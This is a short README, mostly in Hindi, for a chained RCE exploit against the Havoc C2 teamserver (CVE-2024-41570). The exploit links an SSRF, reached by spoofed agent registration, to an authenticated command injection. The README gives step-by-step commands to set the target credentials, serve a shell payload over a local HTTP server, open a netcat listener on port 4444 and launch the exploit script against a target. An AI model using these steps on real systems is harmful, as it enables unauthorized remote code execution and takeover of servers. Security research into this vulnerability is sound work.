
यह Havoc C2 फ्रेमवर्क में एक Chained RCE है, जिसमें github.com/chebuya और github.com/IncludeSecurity pocs का उपयोग किया गया है।
यह Havoc C2 फ्रेमवर्क में एक चेन्ड RCE (CVE-2024-41570) है।
कमांड इंजेक्शन: Havoc कमांड इंजेक्शन के प्रति संवेदनशील है, जो एक प्रमाणित उपयोगकर्ता को Teamserver पर कमांड निष्पादित करने में सक्षम बनाता है। यह संस्करण 0.3 से नवीनतम रिलीज़ 0.6 तक प्रभावित करता है। Havoc की डिफ़ॉल्ट प्रोफ़ाइल में हार्डकोडेड पासवर्ड होते हैं, इसलिए एक C2 ऑपरेटर जो सार्वजनिक नेटवर्क पर डिफ़ॉल्ट प्रोफ़ाइल का उपयोग करने में लापरवाही करता है, उसका तुरंत शोषण किया जा सकता है।
SSRF: इस कमजोरी का शोषण एक डेमन एजेंट पंजीकरण और चेक-इन्स को स्पूफ करके teamserver पर TCP सॉकेट खोलने और उससे डेटा पढ़ने/लिखने के लिए किया जाता है। यह हमलावरों को teamserver के मूल IP पते लीक करने और बहुत कुछ करने की अनुमति देता है।
चेन: प्रमाणित कमांड इंजेक्शन पेलोड पहुंचाने के लिए SSRF का दुरुपयोग करना।

1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh
-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)
# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
श्रेय: @chebuya और @Hyperreality